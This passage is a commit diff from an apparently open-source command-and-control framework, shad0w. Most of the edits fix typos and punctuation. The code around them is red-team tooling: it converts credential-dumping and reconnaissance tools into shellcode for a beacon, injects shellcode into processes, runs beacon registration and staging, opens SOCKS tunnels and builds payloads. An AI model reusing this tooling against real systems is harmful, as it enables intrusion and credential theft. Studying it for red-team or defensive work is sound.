# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpdpapi_args) != 0:

4
lib/commands/sharpdump.py
View File

@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdump binary
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -34,7 +34,7 @@ def main(shad0w, args):
sharpdump_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpdump_args) != 0:

6
lib/commands/sharphound.py
View File

@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharphound binary
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -34,7 +34,7 @@ def main(shad0w, args):
sharphound_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharphound_args) != 0:
@ -48,7 +48,7 @@ def main(shad0w, args):
args.runtime = False
args.appdomain = False
#Generate donut base64 shellcode with "AnyCpu" as target, local bin is x86
# Generate Donut base64 shellcode with "AnyCpu" as target, local bin is x86
b64_comp_data = shellcode.generate(SHARPHOUND_BIN, args, sharphound_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)

8
lib/commands/sharpsocks.py
View File

@ -51,7 +51,7 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
# change to the modules directory
os.chdir(modules_dir)
# create the defualt cmd line
# create the default cmd line
if quick == True:
cmd_line = f"-l http://{http_listen}"
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
@ -109,7 +109,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# save the raw args
@ -140,7 +140,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
parse.add_argument("-v", "--verbose", action='store_true', help="Verbose output")
parse.add_argument("--kill", action='store_true', help="Kill the socks tunnel")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -163,7 +163,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
http_listen_addr = f"*:8080"
key = start_sharpsocks_server(http_listen=http_listen_addr)
if key == None:
print("Failed to start server")
print("Failed to start the server.")
return
threading.Thread(target=await_for_socks_start, args=(shad0w,)).start()

8
lib/commands/sharpup.py
View File

@ -12,10 +12,10 @@ __author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of sharpup binary
# location of SharpUp binary
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpup_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpup_args) != 0:

6
lib/commands/sharpwmi.py
View File

@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpwmi binary
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -32,12 +32,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpwmi_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpwmi_args) != 0:

5
lib/commands/shinject.py
View File

@ -50,8 +50,7 @@ shinject -p 8725 -f shellcode.bin
def build_inject_info(args, rcode):
# create the json object to tell the beacon
# where to execute the code.
# create the json object to tell the beacon where to execute the code
info = {"pid": int(args.pid), "dll": rcode}
@ -135,7 +134,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = ShinjectCommand(args)

6
lib/commands/upload.py
View File

@ -52,7 +52,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -76,13 +76,13 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
parse.add_argument("-f", "--file", required=True, help="Name of the file you want to upload")
parse.add_argument("-d", "--destination", nargs="*", help="Destination where the uploaded file should be stored")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()

10
lib/commands/watson.py
View File

@ -12,10 +12,10 @@ __author__ = "@Flangvik, @_RastaMouse"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of watson binary
# location of Watson binary
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
watson_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(watson_args) != 0:
@ -48,7 +48,7 @@ def main(shad0w, args):
args.runtime = False
args.appdomain = False
#Generate donut base64 shellcode with "AnyCpu" as target, local bin is x86
# Generate Donut base64 shellcode with "AnyCpu" as target, local bin is x86
b64_comp_data = shellcode.generate(WATSON_BIN, args, watson_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)

10
lib/commands/whoami.py
View File

@ -1,5 +1,5 @@
#
# Get infomation about the current user
# Get information about the current user
#
import json
@ -8,7 +8,7 @@ import argparse
from lib import shellcode
__description__ = "Get infomation about the current user the beacon is running as"
__description__ = "Get information about the current user the beacon is running as"
__author__ = "@_batsec_"
# using work around for stager bug
@ -82,11 +82,11 @@ whoami --groups
parse.error = error
# setup the args
parse.add_argument("-a", "--all", action='store_true', help="Show all avalible infomation")
parse.add_argument("-p", "--privs", action='store_true', help="Show all privilages")
parse.add_argument("-a", "--all", action='store_true', help="Show all available information")
parse.add_argument("-p", "--privs", action='store_true', help="Show all privileges")
parse.add_argument("-g", "--groups", action='store_true', help="Show all groups the user is a member of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

2
lib/compile.py
View File

@ -1,5 +1,5 @@
"""
Compile the stuffz
Compile the stuff
"""
import os

4
lib/console.py
View File

@ -76,7 +76,7 @@ class Console(object):
except ValueError: pass
while True:
try:
# display a prompt depending on wheather we got an active beacon or not
# display a prompt depending on whether we got an active beacon or not
if self.shad0w.current_beacon is None:
input = await self.prompt_session.prompt_async(ANSI(self.prompt), completer=self.autocomplete, complete_style=CompleteStyle.READLINE_LIKE)
else:
@ -92,7 +92,7 @@ class Console(object):
with patch_stdout():
input = await self.prompt_session.prompt_async(ANSI(self.active_prompt % (username, machine)), completer=self.autocomplete, complete_style=CompleteStyle.READLINE_LIKE, refresh_interval=0.5)
# handle the input we just recived
# handle the input we just received
try:
with patch_stdout():
await self.cmd_handler.do(input)

8
lib/http_server.py
View File

@ -24,7 +24,7 @@ def log_request():
# shad0w.debug.log(request)
# do nothin jus return
# do nothing just return
return None
@app.route("/")
@ -45,7 +45,7 @@ def web_register_beacon():
shad0w.debug.log("HTTP - '/register' was hit, attempting to register")
# just give it the request so it can pull stuff out itsself
# just give it the request so it can pull stuff out itself
return phandle.register_beacon(request)
@app.route("/tasks", methods=["GET", "POST"])
@ -97,10 +97,10 @@ def run_serv(*args):
phandle = Handler(shad0w)
shad0w.debug.log("starting flask http server")
shad0w.debug.log("Starting flask HTTP server")
shad0w.debug.log(f"Starting HTTPS server ({shad0w.addr[0]}:{shad0w.addr[1]})", log=True)
shad0w.debug.log(f"creating ssl context with {shad0w.sslkey} & {shad0w.sslcrt}")
shad0w.debug.log(f"Creating SSL context with {shad0w.sslkey} & {shad0w.sslcrt}")
try:
app.run(host=shad0w.addr[0], port=shad0w.addr[1], ssl_context=(shad0w.sslcrt, shad0w.sslkey))

2
lib/input_handler.py
View File

@ -41,7 +41,7 @@ class Handler(object):
if len(basecmd) > 0:
# reimport so dont have to restart whole c2 for every file change
# reimport so don't have to restart whole c2 for every file change
# but only do this in debug mode
cmd_func = globals()[basecmd]

4
lib/mirror.py
View File

@ -21,7 +21,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
elif not dynamic:
req = requests.get(site)
except requests.exceptions.MissingSchema:
shad0w.debug.error(f"Need a correctly formatted url e.g https://example.com/")
shad0w.debug.error(f"Need a correctly formatted URL (e.g https://example.com).")
exit(-1)
if not htmlonly:
@ -53,7 +53,7 @@ def fix_internal_links(shad0w, html, site):
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
if not dynamic:
shad0w.debug.log(f"Connecting to {site}...")
shad0w.debug.log(f"Connecting to {site}.")
html = get_base_page(shad0w, site, htmlonly=True)
html = fix_internal_links(shad0w, html, site)
shad0w.page_data = html

20
lib/path_handler.py
View File

@ -17,7 +17,7 @@ class Handler(object):
super(Handler, self).__init__()
self.shad0w = shad0w
# for building responces
# for building responses
self.builder = Builder(shad0w)
def task_beacon(self, request):
@ -43,18 +43,18 @@ class Handler(object):
except KeyError: pass
try:
# if the beacon isnt just checking in to give us
# data then build a responce to give the beacon
# if the beacon isn't just checking in to give us
# data then build a response to give the beacon
if ((opcode == 0) and (data == "")):
# get the current task
tasklist = self.shad0w.beacons[beacon_id]["task"]
# build the responce
# build the response
task = self.builder.build(beacon_id=beacon_id, task=tasklist[0], args=tasklist[1])
# clear the task
self.shad0w.beacons[beacon_id]["task"] = None
# inform user
self.shad0w.debug.log(f"Beacon ({beacon_id}) received task", log=True)
self.shad0w.debug.log(f"Beacon ({beacon_id}) received task.", log=True)
return task
# check if the data is for the current beacon
@ -68,7 +68,7 @@ class Handler(object):
return task
except:
# there aint a task, so tell em that
# there isn't a task, so tell the user that
return self.builder.build(beacon_id=beacon_id, task=None)
else:
# ignore
@ -77,7 +77,7 @@ class Handler(object):
def register_beacon(self, request):
# register a new beacon
# get the info from the initial request an store it
# just ignore if the request isnt correct
# just ignore if the request isn't correct
if request.method == "POST":
@ -139,11 +139,11 @@ class Handler(object):
return self.builder.build(beacon_id=beacon_id, id=beacon_id)
else:
self.shad0w.debug.log("invalid register request")
self.shad0w.debug.log("Invalid register request.")
return self.builder.build(blank=True)
else:
self.shad0w.debug.log("invaild http method for register")
self.shad0w.debug.log("Invalid http method for register.")
return self.builder.build(blank=True)
def stage_beacon(self, request):
@ -199,7 +199,7 @@ class Handler(object):
return rcode
else:
self.shad0w.debug.log("invaild http method for stager")
self.shad0w.debug.log("invalid http method for stager")
return self.builder.build(blank=True)

2
lib/payload_format.py
View File

@ -65,7 +65,7 @@ def format_powershell(builder, length=True, code=False):
builder.outfile = temp_file_name
rcode = format_raw(builder, length=False, code=True)
# insert into the powershell template
# insert into the PowerShell template
pcode = powershell.generate(rcode)
with open(outfile, "w") as file:

6
lib/responce_builder.py
View File

@ -12,7 +12,7 @@ class Builder(object):
def build(self, blank=False, beacon_id=None, **resp):
# build a responce to the beacon
# build a response to the beacon
if blank is True:
return self.IGNORE_CONTENT
@ -22,7 +22,7 @@ class Builder(object):
resp["alive"] = self.shad0w.beacons[beacon_id]["stay_alive"]
# if we got a 'null' task set it to 0x1000
# this will throw a key error when a beacon is registering... hence the try, except.
# this will throw a key error when a beacon is registering. hence the try, except.
try:
if resp["task"] == None:
@ -34,5 +34,5 @@ class Builder(object):
return json.dumps(resp)
except KeyError:
# we got an invaild beacon id
# we got an invalid beacon id
return self.IGNORE_CONTENT

10
lib/shellcode.py
View File

@ -17,12 +17,12 @@ def generate_srdi(file, flags):
def parse_donut_error(data, filename):
if "Error : File not found." in data:
print(f"Unable to find '{filename}'")
print(f"Unable to find '{filename}'.")
else:
print(f"Failed to execute '{filename}'")
print(f"Failed to execute '{filename}'.")
def generate(file, args, params, parse=True):
""" generate shellcode from a pe using donut """
""" generate shellcode from a pe using Donut """
"""
# build args, kinda messy but idk how else to do it
@ -48,9 +48,9 @@ def generate(file, args, params, parse=True):
return base64.b64encode(shellcode_bytes).decode()
"""
# using the python bindings for donut doesn't seem to let them
# using the python bindings for Donut doesn't seem to let them
# build shellcode from a pe with any arguments? Using this as
# a dirty work around untill this is fixed
# a dirty work around until this is fixed
# if we need to parse the args an build it from them then
if parse:

4
lib/templates/dll.py
View File

@ -66,9 +66,9 @@ def compile_exe(code, debug=False):
def generate(raw_shellcode, debug=False):
enc_shellcode = format_shellcode(raw_shellcode)
formated_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
formatted_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
filename = compile_exe(formated_code, debug=debug)
filename = compile_exe(formatted_code, debug=debug)
with open(filename, "rb") as file:
return file.read()

4
lib/templates/exe.py
View File

@ -62,9 +62,9 @@ def compile_exe(code, debug=False):
def generate(raw_shellcode, debug=False):
enc_shellcode = format_shellcode(raw_shellcode)
formated_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
formatted_code = TEMPLATE % (enc_shellcode, len(raw_shellcode))
filename = compile_exe(formated_code, debug=debug)
filename = compile_exe(formatted_code, debug=debug)
with open(filename, "rb") as file:
return file.read()

5
lib/tools.py
View File

@ -29,8 +29,7 @@ def get_data_from_json(jdata):
opcode = 0
data = ""
# if we get any errors, just return the above values
# and this req will then be ignored
# if we get any errors, just return the above values and this req will then be ignored
try:
id = jdata['id']
if jdata['opcode']:
@ -46,7 +45,6 @@ def get_data_from_json(jdata):
async def compile_and_store_static(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static"] = {}
arch = "x64"
@ -93,7 +91,6 @@ async def compile_and_store_static(shad0w):
async def compile_and_store_static_srdi(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static_srdi"] = {}
arch = "x64"